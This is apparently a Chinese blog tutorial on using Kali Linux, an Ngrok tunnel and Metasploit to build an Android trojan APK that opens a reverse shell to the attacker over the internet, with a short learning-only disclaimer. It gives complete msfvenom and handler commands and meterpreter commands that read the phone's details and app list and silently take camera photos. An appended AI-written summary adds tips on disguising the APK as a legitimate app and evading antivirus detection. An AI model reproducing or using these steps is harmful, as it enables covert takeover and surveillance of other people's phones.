kali Linux外网渗透控制Android安卓手机系统。

本文详细介绍了如何使用Kali Linux进行渗透测试,通过Ngrok穿透内外网,创建Android木马APK,监听并控制目标设备。重点讲解了Ngrok注册、Kali配置、MSF工具生成外网木马以及执行操作的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!

简介:

Kali Linux的前身是BackTrack Linux发行版。Kali Linux是一个基于Debian的Linux发行版,它被认为是最好的渗透测试的 Linux 发行版之一,而且名副其实。 

Kali常用配置和基本使用:

  • Kali工具集介绍
  • 修改Kali源和更新软件
  • Kali伪装成win10
  • Kali启动root用户

1.外网步骤思想图

Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成test.apk ----->监听当前Ip是否点击---->目标电脑发送exe---->点击test.apk

1、进入Ngrok网站注册一个用户(Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

 

 

2.下载Kali LInux版本 Sunny-Ngrok内网转发

  1.根据攻击机系统情况下载客户端版本(这里下载Linux 64bita版本) 

 2. 拖入虚拟器托不进去看上一个教程  解压zip

 

3.进入解压好的目录:   报错Tcp就重新去Ngrok重新换一个隧道免费很多人用

./sunny clientid  id  =>隧道id

启动了当前窗口不要关闭

3、MSF生成外网木马

                                                                                      不加Tcp| 端口不然报错

msfvenom -p android/meterpreter/reverse_tcp LHOST=外网穿透的ip地址 LPORT=外网穿透端口 R >/home/test.apk

4、打开msf设置payload,加载攻击模块设置本地IP和监听端口

msfconsole 开启

5.绑定当前端口Ip

  1. use multi/handler 

  2.  set payload android/meterpreter/reverse_tcp

  3. set LHOST 当前Ip Kali

  4. set LPORT 4444

  1. show options (查看IP端口设置情况)

  2. run (开启监听)

 6.等待对方点击test.apk木马病毒

成功就有meterpreter命令行 执行命令即可

sysinfo //查看手机信息
 

 

 app_list //查看手机app信息

 

 

 webcam_snap  //拍照
 

 

保存到此目录

成功拍照。

:我的手机拍照过程有声音,

总结:

就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->

监听到信息连接----->成功!!!

Kali Linux 是一个专门为渗透测试和安全审计设计的操作系统,它包含了一系列强大的工具来帮助安全研究人员和黑客进行攻击和防御测试。如果目标是使用 Kali Linux 实现对手机的远程控制,则通常涉及生成一个恶意可执行文件(payload),并通过社会工程学或其他方法将其部署到目标设备上。以下是实现这一目标的基本步骤: ### 生成 Payload 使用 `msfvenom` 工具可以生成适用于不同平台的 payload。对于 Android 手机,可以使用如下命令生成一个反向 TCP 连接的 payload: ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=你的公网IP LPORT=监听端口 -o 文件名.apk ``` 例如: ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=9999 -o MyDemo.apk ``` 此命令会创建一个名为 `MyDemo.apk` 的文件,它可以在 Android 设备上运行,并尝试连接到指定的 IP 地址和端口。 ### 设置 Metasploit Framework 在 Kali Linux 上启动 Metasploit Framework,并配置一个多处理监听器以接收来自 payload 的连接: ```bash msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 9999 exploit ``` 这将启动一个监听器,等待来自目标设备的连接请求。 ### 部署 Payload 生成的 `.apk` 文件需要被安装在目标手机上。这通常通过社会工程学手段完成,比如伪装成合法的应用程序发送给目标用户,或者通过其他漏洞利用方式注入到设备中。 ### 免杀技术 由于现代智能手机通常配备有安全防护措施(如 Google Play Protect),生成的 payload 可能会被检测为恶意软件。因此,可能需要使用一些免杀技术来绕过这些防护机制。这包括但不限于对 payload 进行加密、混淆、使用合法证书签名等方法。 ### 注意事项 - **合法性**:在任何情况下,未经授权对他人设备进行远程控制都是非法的行为。所有操作应在合法授权范围内进行,如渗透测试或安全研究。 - **道德责任**:即使技术上可行,也应遵守道德规范,不得滥用此类技术侵犯他人隐私或造成损害。 - **安全性**:确保自己的设备和网络环境安全,防止被他人利用相同的技术进行攻击。 ###
评论 28
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大福ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值